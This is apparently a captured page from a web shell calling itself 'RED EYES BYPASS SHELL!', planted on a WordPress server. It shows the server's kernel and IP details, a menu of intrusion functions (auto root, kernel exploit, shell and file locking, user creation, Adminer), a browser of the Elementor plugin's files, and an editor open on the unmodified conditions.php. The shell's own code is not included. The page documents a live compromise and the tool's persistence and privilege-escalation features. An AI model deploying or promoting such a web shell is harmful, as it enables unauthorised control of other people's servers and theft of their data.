Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
plugins /
elementor /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin-templates
[ DIR ]
drwxr-xr-x
base
[ DIR ]
drwxr-xr-x
controls
[ DIR ]
drwxr-xr-x
editor-templates
[ DIR ]
drwxr-xr-x
elements
[ DIR ]
drwxr-xr-x
interfaces
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
managers
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
template-library
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
api.php
6.57
KB
-rwxr-xr-x
autoloader.php
9.28
KB
-rwxr-xr-x
beta-testers.php
2.99
KB
-rwxr-xr-x
compatibility.php
10.62
KB
-rwxr-xr-x
conditions.php
2.7
KB
-rwxr-xr-x
db.php
14.73
KB
-rwxr-xr-x
embed.php
8.33
KB
-rwxr-xr-x
fonts.php
56.36
KB
-rwxr-xr-x
frontend.php
38.82
KB
-rwxr-xr-x
heartbeat.php
2.57
KB
-rwxr-xr-x
maintenance-mode.php
11.13
KB
-rwxr-xr-x
maintenance.php
2.59
KB
-rwxr-xr-x
plugin.php
15.95
KB
-rwxr-xr-x
preview.php
7.46
KB
-rwxr-xr-x
rollback.php
3.63
KB
-rwxr-xr-x
shapes.php
6.38
KB
-rwxr-xr-x
stylesheet.php
8.91
KB
-rwxr-xr-x
tracker.php
15.35
KB
-rwxr-xr-x
user.php
9.89
KB
-rwxr-xr-x
utils.php
21.6
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : conditions.php
<?php namespace Elementor; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Elementor conditions. * * Elementor conditions handler class introduce the compare conditions and the * check conditions methods. * * @since 1.0.0 */ class Conditions { /** * Compare conditions. * * Whether the two values comply the comparison operator. * * @since 1.0.0 * @access public * @static * * @param mixed $left_value First value to compare. * @param mixed $right_value Second value to compare. * @param string $operator Comparison operator. * * @return bool Whether the two values complies the comparison operator. */ public static function compare( $left_value, $right_value, $operator ) { switch ( $operator ) { case '==': return $left_value == $right_value; case '!=': return $left_value != $right_value; case '!==': return $left_value !== $right_value; case 'in': return in_array( $left_value, $right_value, true ); case '!in': return ! in_array( $left_value, $right_value, true ); case 'contains': return in_array( $right_value, $left_value, true ); case '!contains': return ! in_array( $right_value, $left_value, true ); case '<': return $left_value < $right_value; case '<=': return $left_value <= $right_value; case '>': return $left_value > $right_value; case '>=': return $left_value >= $right_value; default: return $left_value === $right_value; } } /** * Check conditions. * * Whether the comparison conditions comply. * * @since 1.0.0 * @access public * @static * * @param array $conditions The conditions to check. * @param array $comparison The comparison parameter. * * @return bool Whether the comparison conditions comply. */ public static function check( array $conditions, array $comparison ) { $is_or_condition = isset( $conditions['relation'] ) && 'or' === $conditions['relation']; $condition_succeed = ! $is_or_condition; foreach ( $conditions['terms'] as $term ) { if ( ! empty( $term['terms'] ) ) { $comparison_result = self::check( $term, $comparison ); } else { preg_match( '/(\w+)(?:\[(\w+)])?/', $term['name'], $parsed_name ); $value = $comparison[ $parsed_name[1] ]; if ( ! empty( $parsed_name[2] ) ) { $value = $value[ $parsed_name[2] ]; } $operator = null; if ( ! empty( $term['operator'] ) ) { $operator = $term['operator']; } $comparison_result = self::compare( $value, $term['value'], $operator ); } if ( $is_or_condition ) { if ( $comparison_result ) { return true; } } elseif ( ! $comparison_result ) { return false; } } return $condition_succeed; } }
Close